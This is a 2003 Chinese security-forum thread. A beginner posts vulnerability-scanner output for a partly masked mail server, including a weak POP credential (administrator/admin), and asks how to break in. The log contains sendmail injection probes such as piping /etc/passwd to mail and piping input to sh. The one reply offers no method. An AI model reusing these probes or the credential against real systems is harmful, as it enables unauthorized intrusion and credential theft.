论坛: 菜鸟乐园 标题: 菜鸟求助:我扫描得到了一个POP弱口令,有什么用吗? 复制本贴地址    
作者: fangxian12 [fangxian12]    论坛用户   登录
我用X-way扫描一个IP203.93.*.*  得到以下信息,请问POP弱口令有什么用?如果要进入这台机器,具体怎么做?谢谢!

。。。。。。
WEB服务信息检测

服务检测 SMTP-> 220 merak.bj-shuma.net ESMTP Merak 5.4.2; Sun, 05 Oct 2003 12:13:34 +0800
服务检测 POP-> +OK merak.bj-shuma.net Merak 5.4.2 POP3 Sun, 05 Oct 2003 12:13:35 +0800 <20031005121335@merak.bj-shuma.net>
服务检测 HTTP-> OmniHTTPd/2.10
服务检测 IMAP-> * OK Merak 5.4.2 IMAP4rev1 Sun, 05 Oct 2003 12:13:44 +0800



--------------------------------------------------------------------------------

FTP匿名检测



--------------------------------------------------------------------------------

SMTP检测

支持VRFY
支持EXPN
检测 SMTP->203.93.*.* 501 5.5.1 HELO/EHLO requires domain address
检测 SMTP->203.93.*.* 检测debug漏洞 500 5.5.1 Command unrecognized: "debug"
检测 SMTP->203.93.*.* 检测kill漏洞 500 5.5.1 Command unrecognized: "kill"
检测 SMTP->203.93.*.* 检测wiz漏洞 500 5.5.1 Command unrecognized: "wiz"
检测 SMTP->203.93.*.* 检测rcpt to: /tmp/.rhosts漏洞 503 5.5.1 Incorrect command sequence
VRFY administrator ...OK
检测 SMTP->203.93.*.* 检测+ +漏洞 500 5.5.1 Command unrecognized: "+ +"
检测 SMTP->203.93.*.* 检测RSET漏洞 250 2.0.0 Reset state
检测 SMTP->203.93.*.* 检测mail from: |/bin/mail hacker < /etc/passwd漏洞 501 5.5.2 |/bin/mail... Domain name required
检测 SMTP->203.93.*.* 检测RSET漏洞 250 2.0.0 Reset state
检测 SMTP->203.93.*.* 检测mail from: |tail|sh漏洞 501 5.5.2 |tail|sh... Domain name required
VRFY webmaster ...OK
VRFY admin ...OK



--------------------------------------------------------------------------------

FINGER检测



--------------------------------------------------------------------------------

RPC检测



--------------------------------------------------------------------------------

弱口令检测

POP弱口令:administrator(admin)



--------------------------------------------------------------------------------

端口检测

23 [telnet]
25 [smtp]
80 [http]
110 [pop3]
135 [epmap]
3389 [Terminal]



--------------------------------------------------------------------------------

CGI/ASP漏洞


地主 发表时间: 10/05 12:29

回复: bird [huoniao]   论坛用户   登录
你的问题我看了...什么都不好的...因为这只是入侵的...皮毛知识...朋友
多和别人聊聊...多看看书...看看论坛...

B1层 发表时间: 10/05 14:13

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号